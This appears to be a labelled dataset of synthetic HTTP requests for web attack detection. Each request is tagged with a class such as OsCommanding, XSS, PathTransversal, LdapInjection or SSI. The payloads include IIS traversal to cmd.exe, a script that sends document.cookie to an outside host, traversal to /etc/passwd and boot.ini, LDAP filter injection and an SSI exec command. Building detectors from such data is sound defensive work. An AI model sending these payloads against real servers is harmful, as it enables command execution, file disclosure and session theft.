GET /Hnjup9r/cdoIecnbtpe/edie9iwNm4okti/9KQ5qX/wroeeasreadedltwle/cornzo7gttaytsoUP.gif?h7ensaerzyaI=sdR1r&access_logX5maSr=%3Eaorn&ddtsurhrno=g019VvHrVy&1e=eiAha0rhrlabRnesl&f7itdthbusmde=02251&wliatq=afmi&nmtms2=9831&KKvnull-=gZXMy2Mj&eeirsho6l=71921 HTTP/1.1
Host: 173.124.247.174:27
Connection: Tdatb
Accept: image/png;q=0.4, image/*;q=0.4
Accept-Charset: windows-874;q=0.9
Accept-Encoding: 9589     or    1<    th/thft/Oajsss/child::text()[position()=61]   or   7='] | /* | /foo[bar='
Accept-Language: hieOw-hurnfa, tIiifh-Nrl;q=0.0, osldt-sws0iec;q=0.8
Cache-Control: only-if-cached
Client-ip: 30.17.183.26
Cookie: ulilmttbi=a<lxlet;utlt9ethd=hntv
Cookie2: $Version="428"
Date: Sat, 03 Sep 05 15:24:43 CET
ETag: W/"8bryrAVeHZlsVcY0"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Tue, 27 Dec 05 19:44:27 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Dec 05 05:42:23 CET
Max-Forwards: 9170
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: NTLM NGdhYmNLdTBtZGF0dGhoc29EYXN1cGlyNGNuOGFkZFN0YU5ycnNuc2pkWHM2TA==
Referer: http://CcOea.st/liisg/LznnsF/eNan/nosfe3w.swf
TE: trailers,gzip;q=0.4,chunked;q=0.7
Trailer: If-Modified-Since
User-Agent: Mozilla/2.7 (X11; U; Unix 8.1; ha-ga; rv:1.1.3) Gecko/12512832
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 5.1 www.cgDcrq.htm, FTP/1.1 51.255.105.88
Transfer-Encoding: identity
Upgrade: Fath/7.2
Warning: 835 www.tlNlwgs.gif:920 "iep7CLmofu" "Sun, 29 Feb 04 15:41:20 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48314
Start - Id: 36464
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.iezvhaint.biz
Connection: egji
Accept: */*;q=0.4
Accept-Charset: iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 9.139.53.150
Cookie: vya=s-;raheemotsrd=36;cr=04096358;1Soj1tmpdA3P8=el;Azsroati=sp7i;qi=yoemc
Cookie2: $Version="0"
Date: Wed, 03 Dec 08 01:01:24 UTC
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Sat, 09 Jul 05 18:00:32 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jul 05 06:34:10 GMT
Max-Forwards: 0771
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Basic ZGVxZXRobno6YXN5b2lpZHM=
Range: 57-,410056-,436232-1281
Referer: http://pt3ne.st/etattctt/e4schC.jpg
TE: trailers,gzip
Trailer: Accept
User-Agent: toE7tmmht3c
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 3.4 www.eikhso.png
Transfer-Encoding: gzip
Upgrade: fet/9.1, iro/2.9
Warning: 940 176.201.209.211 "dndrrAtk" "Mon, 05 Jan 04 22:49:43 CET"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 36464
Start - Id: 47164
class: XSS
GET /ku4yeuIi/shjnnilfdrinffOh/tro/hv@lAhvm-/gB@qO-8@gM8lP8/9ce1hyqtof7yit1k.mdb?ieosYfesatu=83&dt=lBv&nmyrme=10&3fVH9KCj=6857934746&njhavingwBwp-ydr=thaving%5C%7Eh%7E&aer5wnNaNqeea=954&aee=DStjlxEc&vn07Kobjectfnsock_streamWT=rshkhMz&krAeolgtddisegw=%7Cobjecto7&afsemelnhsnt19m=3109&t7mWlyi=hn&wdnomoaHT=%26%7B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.de.com%2Fcgi-bin%2Ftrto.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&formXCHAgmiq=skK1&m3hscicmhpGr=ao HTTP/1.1
Host: 221.9.79.151
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-cn;q=0.7, x-mac-ce;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 46.131.2.199
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="26"
Date: Mon, 04 Oct 04 20:34:56 UTC
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: gtnerzt=Id9itho;tuni=iedt2
From: rRktr@tnrerr.uk
If-Modified-Since: Tue, 09 Oct 07 15:31:44 UTC
If-Unmodified-Since: Tue, 15 Jan 08 02:45:59 GMT
If-Match: *
If-None-Match: "Io-b84zdkEvEMlWVzlDn"
If-Range: "4w@F20wa9jsbLKaS@69"
Max-Forwards: 5942
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: /yoeqltU/Rtepzldu/ow7osye.jpg
TE: gzip;q=0.3,trailers
Trailer: If-Range
User-Agent: raZqkegKW http://www.osoio.ch
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47164
Start - Id: 36662
class: OsCommanding
GET /9WM/ewyteTm8Esn5iEtas/ftaAsbqpxithesbf8g/hE3ICiP/rQO3Ns_3_As.4NNK7npH/n2e.jpg?Dn=eeuHotzkhwynd+macceptk&frnuulec=osvvifitdEmlhkt5&nehsAehiasEfpt=556634&igJvTyTdi-=ewrogkerepr&iecbJ8a=49.155.48.212+%7C++++dir HTTP/1.1
Host: 180.51.111.82
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Client-ip: 63.137.108.57
Cookie: osyiEm1a=dei;9urjub9icyto=080;Dercarn9o2anr=18;po7iDeiraPrer=769
Cookie2: $Version="0"
Date: Wed, 07 Jul 04 01:09:49 GMT
Expect: 100-continue
If-Modified-Since: Sat, 16 May 09 23:40:00 CET
If-Unmodified-Since: Fri, 22 Dec 06 23:00:26 GMT
If-Match: *
If-None-Match: "nyD7@V820F9DFEypo"
If-Range: Thu, 01 Apr 04 12:13:19 UTC
Max-Forwards: 378
Pragma: 6es=ia
Authorization: NTLM aXRkd2FoZDVlRWwxZW9pdHdoZXllVHJhdW4wdHI4czJ0U3NmYWVJV21w
Range: -658323,933536-0,-3
Referer: http://othlsc.org/6tlh/oiPan/ntc4en9.gif
Trailer: Host
User-Agent: Mozilla/9.1 (Machintosh; U; Mac OS X 4.0; Si-8k; rv:7.0.0) Gecko/31084616
Via: 2.6 232.132.151.243, 3.0 www.r7hnwas.js
Warning: 660 www.iBaqr.jpeg "5ORlnh5fsrPedhIie" "Tue, 25 Oct 05 23:59:57 GMT"
X-Forwarded-For: 203.249.198.130
----: ------------

null

End - Id: 36662
Start - Id: 47220
class: XSS
GET /Iesm4Ffotcdgo1eSanv/wfMVQ5YI/uXqkAOaiG/nTiaslBeohi6ria/eriomUahTv/e1n0uRBQ.60zY9mNou/tUtAF4cM5kP_mZC/ti7OtUCwNL./yZmBSM/nuhpin1loeTonfnnswy/aIkc_dZq63N/sKpwTCOE9@wNgGggJstZ.tiff?icWu=oo%28ac&qjaAetnhe=nideayr&lmaI=112&toDB=%3Ciframe++++src++%3D+%22+++vbscript%3A%5Balert+++%28%27eqoQ8lssil%27%29%3B%5D+++++%22++++%3E&tpcnrrsAo=zniiemdndtmsiT&7bodyP76L3=vuhtra0tf-ojv%7Eneeeha&jpsbi6nteshebg=lp5h&rtnedn=u HTTP/1.0
Host: www.aBhNavksEM.net:80
Connection: mLetipt
Accept: video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=64203
Client-ip: 0.255.111.70
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Thu, 22 Jul 04 05:03:36 UTC
ETag: "sffq97EglwyE3Ups"
Expect: 100-continue
From: ti73@utlaaob.ch
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Wed, 17 Mar 10 13:21:38 GMT
If-Match: *
If-None-Match: "-D550.D.41M_iKp_LQAq"
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 161
MIME-Version: 6.5
Pragma: d=swausxe
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Basic Y2hyTWlyczE6a2lyc3Q=
Range: 4321-2
Referer: /hCsemnr/ghtciOt.pdf
TE: gzip
Trailer: Referer
User-Agent: Mozilla/3.6 (compatible; Konqueror/8.9; Unix; xyidn; Ea0mo; lonli)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: HTTP/8.6 www.eteoof.css:237
Transfer-Encoding: identity
Upgrade: tee/0.1, nRteE6/5.5, eroitr/4.3
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 102.233.207.222
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47220
Start - Id: 46031
class: PathTransversal
GET /ytnbp21oeNgerofESfsc/0@nH/0mengTyNEvij/aWotQ1EZ3TYE9iD.32i_/PtPeerbhsetsA/sWmefe8tStagedo/yieat9o/KMNS6/reszda5wnip.gif?emepnsc9tmnoo=oeO&btnHf=8915203&wbsastnsolue=r%3Dnfaoed3&olev6suesla6=ceSmoook&betweenGJExXdRwMP=0827123&ttctpoeamYttntd=hL7&noethTh=pxtermlsi+odia&mc=3erx+&iiaieR0Ererrrn=IuP HTTP/1.1
Host: 242.190.12.205
Connection: close
Accept: image/*;q=0.9, audio/basic
Accept-Charset: koi8, iso-8859-6;q=0.7
Accept-Encoding: *
Accept-Language: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cache-Control: no-cache
Client-ip: 33.41.180.127
Cookie: Hq6@F@r=iframetorm;n8cC8ueeli=Tfelseb;5yA6=eVvu;eaerheAsmIyiere=IdwimgmsiHynem;yepnseic2aTshl=jmjcoosNilagNR4pac;aps=stltey3nsiiguna
Cookie2: $Version="18"
Date: Sat, 17 Sep 05 11:24:20 UTC
ETag: "U4T9KOeUcYTVVN0L-1U"
Expect: 100-continue
From: epmndmfY@vm5t.be
If-Modified-Since: Sun, 15 Jun 08 05:44:06 UTC
If-Unmodified-Since: Fri, 18 Dec 09 20:26:45 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Jun 08 20:25:38 GMT
Max-Forwards: 85
MIME-Version: 4.8
Pragma: teeliO=ts9Rotx
Authorization: Digest qop=ySteten
Range: 9679-,0-89825,53-
Referer: http://eedeyeg.biz/ea5nhc/emsW2ea/jto5eex.dll
TE: deflate,chunked
Trailer: Authorization
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 2.1; le-ha; rv:8.1.0) Gecko/34179638
UA-CPU: Sparc
UA-Disp: 182,7559,16
UA-OS: Windows NT
UA-Color: color32
Via: 3.7 www.e0Iy.html, e9ehoc/5.9 73.164.17.150
Transfer-Encoding: compress
Upgrade: 1eo/9.5
Warning: 143 www.eihfkbo.htm "7taunsi" "Fri, 01 Apr 05 24:33:27 CET"
X-Forwarded-For: 20.101.217.179
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46031
Start - Id: 36255
class: PathTransversal
POST /rdotstsprezuthhE1r9/6Z49._H-LD-/xEdionnsen5/enexvAdn/yH/gmfiframefa0_/B2LHNRz6x.png? HTTP/1.0
Content-Length: 272
Content-Language: vL
Content-Encoding: identity
Content-Location: /qopouDrd/uccjictu/sxmh/i7itoRqs.conf
Content-MD5: dGVjcnNwbVNpdG1ldGVoUw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jul 04 13:52:54 CET
Last-Modified: Sun, 01 Feb 09 12:08:25 UTC
Host: www.qdorsoe.net
Connection: keep-alive
Accept: image/png;q=0.9, video/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, compress, deflate;q=0.9, gzip;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 44.220.122.164
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="7"
Date: Tue, 26 Sep 06 13:08:17 UTC
ETag: W/"jRY8PxZkXX-fCGouhR8"
Expect: eigacm=eafotax;3ngniEI=1owL6ot
From: tarcw@rtJihd7rad.st
If-Modified-Since: Wed, 28 Mar 07 16:19:32 CET
If-Unmodified-Since: Tue, 27 Nov 07 15:16:24 GMT
If-Match: "x4aNwGZQrBQOuTDN5c"
If-None-Match: "r_zI2SNlV5bO5Yxa"
If-Range: *
Max-Forwards: 7681
MIME-Version: 4.1
Authorization: NTLM ZWwzM21vaHJpZGNpZndlOWhjZTF0TnJ6ZTkyU2x1aGxtZHJudHExbnRWamlO
Referer: http://ddbsil.st/ahExr/e3e6tdrh/easowo.dll
User-Agent: Mozilla/4.7 (Windows; U; WinNT 0.2; sd-Hn; rv:8.3.1) Gecko/48566340
Transfer-Encoding: compress
Warning: 299 www.ni9etq.css "deecyxs" "Sun, 01 Apr 07 19:16:21 UTC"
X-Serial-Number: 373561345188
----: -------------------------------------------------

Czdngbh3ta245=01777&IAMnVlsC4nQ=i/delete&ga=4)=snwdupdatecaxka&-Brcp61=  s44&hoer=Amlnce]ifh&uanaiillnai=22&uzaythA=/etc/passwd&spcfn=clog% j&omzeheesig=~metanccs[wt%&uZ2pRp4A=76603&A8tgnHi=859&vnetja=nm&Oaccess_log8Bh2=9860&jinob=e&ptvsor6geuttn=66652

End - Id: 36255
Start - Id: 38909
class: LdapInjection
GET /ogdXyu@rXk/gS3Jzinrs/xgej/z@dd6Z8Hm6.k_pR/cd7n/lft3nVIuYD/e0Ttiks/Ib/oJxngwoJpGD4LR/eVtsie0ieoe.cfm?anadcawdelh=gyou&rbwctpEba5onn=98127&fjnR=ndnen%29%28%26%28objectClass++%3Dta*%29&coeN9wkA=47389&aYQtmbreplaceGITsrm=eratsi-n&sYiddFoniohzgq=oTi7&ewn6uEneweninnn=9hlZUhha%7Ecedmbeu&grmRrt=c%3CephpwsHe7hrA%26ySmiamc HTTP/1.0
Host: 26.78.105.30:0906
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: hz-gb-2312, euc-kr;q=0.2, euc-kr
Accept-Encoding: deflate, compress;q=0.5
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 68.221.116.115
Cookie: nO9io8=tygoaicsintqfciiy;Oupusss=a~ iaoBf4:o3;umocha8PPG4=tdocumentiecgymstdinivminsert 
Date: Wed, 15 Mar 06 11:04:56 UTC
ETag: W/"E8jHF1YpjxHTbtDDxA"
Expect: 100-continue
From: neenu@alestrhlsH.gov
If-Modified-Since: Sun, 20 Mar 05 22:52:35 UTC
If-Unmodified-Since: Tue, 28 Dec 04 22:32:53 UTC
If-Match: "oGoXZrgLub7@borF5G"
If-None-Match: "72QjArJI6ifUx12"
If-Range: Wed, 31 May 06 24:02:14 GMT
Max-Forwards: 8
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: Digest username="23tl"
Range: 82450-0782,-876
Referer: /or4r/tmoinAts/puap2qS/riytTgln.dll
TE: trailers
Trailer: If-Modified-Since
User-Agent: 7rAjah
UA-OS: Win95
Via: 4.6 www.0ddt.htm
Transfer-Encoding: gzip
Warning: 030 15.234.179.243:602 "99idf55dwaaqmsdiequf" 
X-Forwarded-For: 62.216.65.91
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38909
Start - Id: 44249
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 197.170.129.91
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: E6nceutt-i0
Cache-Control: max-age=1302
Client-ip: 182.20.30.117
Cookie: lsboI35en=5eo7ln;fe=fey;seiTr=p1
Cookie2: $Version="0"
Date: Thu, 31 May 07 02:21:13 UTC
ETag: "-8T0kbq_jilGiD3"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Tue, 09 Oct 07 03:46:43 GMT
If-Unmodified-Since: Tue, 28 Dec 04 13:56:19 CET
If-Match: "jSRoJer_RD4y28gIjjo"
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 7.7
Pragma: kadlo3=ttpvis
Proxy-Authorization: Basic YmVhemVzOmF0b2dhbGU=
Authorization: Digest qop=auth
Range: 9644-,6569-1848
Referer: http://www.tret.fr/Tvetnn/tmbiI.rar
TE: trailers
Trailer: Range
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 6.5; 6t-mH; rv:0.6.8) Gecko/66972507
UA-CPU: Sparc
UA-Disp: 220,5543,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: 6ris; osgnkcE=urwji
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 254 www.7iedsus.jpg:00477 "ntLgsd" 
X-Forwarded-For: 159.74.103.38
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44249
Start - Id: 45549
class: PathTransversal
GET /objectFikElfWjKc/WYX.pl?dr=aptfrTIIi&ithnlou3=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.1
Host: 76.233.212.187
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, identity;q=0.4, gzip, identity;q=0.3
Accept-Language: ig-stetrU;q=0.5, hp6x-wsunsiH3;q=0.8
Cache-Control: min-fresh=7
Client-ip: 15.78.136.11
Cookie: hzrArkq=a q;Ihnsiln=7324;tDteebs2=kf@Ch2bew
Cookie2: $Version="19"
Date: Fri, 07 Dec 07 07:52:33 GMT
ETag: W/"PFUNEE-2p-Js2P9AZMS"
Expect: urperzok
From: hwpha@Suan.org
If-Modified-Since: Sat, 08 Jul 06 17:46:48 UTC
If-Unmodified-Since: Mon, 21 May 07 11:05:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 256
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: 903-3,3-4324,-8
Referer: /eesAo5/tybsv/Emtue/asdTnaz/e0shopew.jpg
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.7 (Windows; U; Win98 3.3; ee-m5; rv:5.9.3) Gecko/25252427
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/9.2 86.2.124.28:29375
Transfer-Encoding: compress
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45549
Start - Id: 46443
class: PathTransversal
POST /ClExp_qnS/kskh2/hc-CDFJfx328/uRBGq/zGlh4YLTvarimga/ehWtru2N/hldAlcmifseacy1w/iegtse9jotemrlee5.html? HTTP/1.0
Content-Length: 252
Content-Language: ttbrg
Content-Encoding: compress
Content-Location: http://lazp.biz/mtiegcOq/ewn8/h8exg/deND.asp
Content-MD5: b29kYmFoYXNvM2RvdnNxbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 10:06:09 GMT
Last-Modified: Thu, 26 Apr 07 12:57:41 CET
Host: www.kum2Tn.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: ../../../../../../proc/version
Accept-Language: emtsu-nm, tti83-cnaAd6h, g-r9v;q=0.1, jm9-aiqy;q=0.7, l-bntnhwh;q=0.9
Cache-Control: max-stale=615
Client-ip: 154.251.42.5
Cookie: feJ_Y@=63;R4mEf=bda;body1p0shutdown5s=rmn 3pw;FuVNUajc=rQAL3ERw_
Cookie2: $Version="5"
Date: Sat, 14 Jul 07 10:05:44 CET
Expect: te9bzU=vamasrr;Ndrl2s=amtw1ee
If-Modified-Since: Fri, 26 Nov 04 05:22:24 UTC
If-Unmodified-Since: Wed, 20 Jul 05 08:25:47 UTC
If-Match: "mr0@yFj@yTxee.yu"
If-None-Match: "tMEJkVSg2OrljzrS9s"
If-Range: Thu, 29 Dec 05 02:43:59 UTC
Max-Forwards: 279
MIME-Version: 5.1
Pragma: ytF='issot5'
Proxy-Authorization: NTLM ZWkyemh1bHB6d2kwZnJhY3NldHdvYXNlZDdpaEFlc2FpcjRwVG9Bb3RnbmVvZmU=
Authorization: edst ntDr0=tnuswr
Referer: /kagnNl.asp
TE: gzip;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.5 (compatible; Konqueror/1.8; Unix; om8mntnH; yhh5heeiIg; cpailtr)
UA-CPU: MIPS
UA-Color: color32
Via: 6.1 www.tgrcbn.tiff, FTP/2.2 www.7stt7.shtml
Transfer-Encoding: gzip
----: ---------------

scdi7sSE=E:sdeT0arwlikeftphpi?i7c&gs3pehiilgb=80727254&owwinntselect40dCFgjLlike=8245583&TGLUg4Cqhtacces4=esueSBlhcMr&ryTadminZJ_n=LadE&Lyppovnyecdc=tiarigt&ibStusr29n=eo&t0ugoItrt=hweo/3group bysa]EnE&easrh5idtRsSz8=nmRl&tvtlutoepner8l=3862892

End - Id: 46443
Start - Id: 40265
class: SSI
GET /Lpassthru/sb/TvdooSie4tt/cgetvtraer/boot.iniUHHFQttelnet9/CL5jKtIHservicesservicesDPE/sw@V/dJYfUMY/YopenmUyu.RUlink.jpeg?eyasey=otptnewttadaze&oLwuaqo=%3C%21--++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Cra%5CDTn%5C3uta.exe+++++d%3A%5Ccee%5Cwww.derederoni.org%5Carcweetrrt%5Cdatabase.mdb++%2Fx+++exporttofoxpro%22--%3E&rblrPsbKEircig=065251&see5=eAlQQc4&6Rse1rotflheeSa=qe2naY7kgyi&3zPZbF=dXQ-UEAp.4&v33eaunDt=1875&e0zakbtd2uos=1teo0a&os=Iealu&uA00auV9cqinsertq=+%5Dg&rhihspg=7%400-6H-&ies6ttct0weei=ttees8cn7&fH.YqUSuqel=36341165&o04naIilnnr=7B9Ok HTTP/1.1
Host: 53.164.163.217:780
Connection: eltepait
Accept: */*
Accept-Charset: big5, x-mac-chinesesimp;q=0.3, macintosh, euc-jp;q=0.9, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: a2sj-Iru6r;q=0.0, t7lItw-n;q=0.1
Cache-Control: rx='Sinr2Iab'
Client-ip: 140.72.125.191
Cookie: lnoneioor=037771095;hejreoEeisbetx=TsestDoptnvhot;ne=2fW6J;q2.N=zpltectnetcata9open8;icykajTiteosdni=8677194556;i8aT1c2i=aLC3T3Enjj
Cookie2: $Version="14"
Date: Tue, 15 Aug 06 10:23:10 UTC
ETag: W/"B6wSrN4YjC3rpPVq"
Expect: 100-continue
From: egziMn7g@s6edmgn.st
If-Modified-Since: Mon, 28 Feb 05 21:54:39 CET
If-Unmodified-Since: Thu, 21 Jun 07 10:39:49 CET
If-Match: "rSCGOwXFNPvP-sEum"
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: "atnOO.VOMeoQPML2"
Max-Forwards: 9
MIME-Version: 1.0
Pragma: aneen=Id
Authorization: Basic Z1RvaWRtczY6b3NsZQ==
Range: -72,34-,551452-70
Referer: /Nacin7/aZeut/eRlaee.php3
TE: trailers,trailers
Trailer: Authorization
User-Agent: enIa (hRO6d1tMu0; d@O_4Y; e6VMyTz-zq; eCFB4-Ciu)
UA-CPU: MIPS
UA-OS: Win95
Via: 4.6 www.eh0rs.jpeg, FTP/3.9 121.161.109.77:866, FTP/3.5 148.166.184.17
Transfer-Encoding: rapc52
Upgrade: zebo/3.9
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40265
Start - Id: 45879
class: PathTransversal
GET /i0on4opS4rhitz9d/HwIWUtmpL3-Owinntq6/A1/w4vdkiutoolL1tsli/rilixmtjlae6fdc/onafnioAki64/ODD/hD_DDyrk09usCGt0qp/wVtINqeYL2_1kD78/bgpdi.exe?@PBZvh.E=q%3A%5Cwindows%5Cboot.ini HTTP/1.1
Host: 19.110.45.73
Connection: close
Accept: application/x-tar;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: tddbge-rdgol;q=0.8, 9n-tnd, sf-hsc2vdm;q=0.9, o-om2ihqa, so-naEo;q=0.0
Cache-Control: min-fresh=1154
Client-ip: 14.151.219.100
Cookie: 1uBUYc7GNpasswd=45;XN7XW9VLgd=suN
Cookie2: $Version="07"
Date: Fri, 02 Oct 09 12:40:06 CET
ETag: "qcIN6.ToaSAjnoWr"
Expect: r9wd
From: erymey@jq6fn.org
If-Modified-Since: Thu, 30 Jun 05 20:25:14 GMT
If-Unmodified-Since: Mon, 04 Jan 10 07:17:36 GMT
If-Match: "G26ugG9CeSPmKJsmF."
If-None-Match: "4FeUjTsqUR9znO0sZ68U"
If-Range: *
Max-Forwards: 189
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: NTLM dGxjcnhpY25lcjNhckRvM2F1dGNsdDhpbWhlbXQyc2hpdGV1ZWU=
Range: 81947-,357703-
Referer: http://trraus.ch/tptAa/mgsesd/aeBaaai/cn7ctl8h/9hlIerph.mdb
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.5 (Windows; U; Win98 2.2; sn-ns; rv:1.0.9) Gecko/63284959
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0549x672
Via: 5.5 178.249.241.70
Transfer-Encoding: pqirj
Upgrade: uerl/3.0, gur/9.5, vSut/6.5
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 9205115584869
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45879
Start - Id: 44935
class: PathTransversal
GET /escrayeJu/rLF8vymobn_/m7d6lApt6/tLPrA6ol/BxARj/oUu3qOzU/mZgYEnodePbr/hIJmJ.TgBR9GaOFq/sNe.php4?sRhsRdtbsE1=..%2F..%2F..%2Fanlari%2Fadmin.txt&nisqewoeerei=%402&jhygatrzlz0r=626748&ttraacErwet=%299opassthru&vTlreal=slS&6Tyxe4emxir=9ddvOkontiwo HTTP/1.1
Host: www.dcOk1.fr
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 119.33.88.93
Cookie: co=ecus;Y3httpsA=tXhtopcr\stdin3;nmup=eafe
Cookie2: $Version="19"
Date: Mon, 14 Jun 04 06:29:23 GMT
ETag: W/"FTabip4q-bvxfAK_"
Expect: 100-continue
From: soalt1r@dvplbabmDs.be
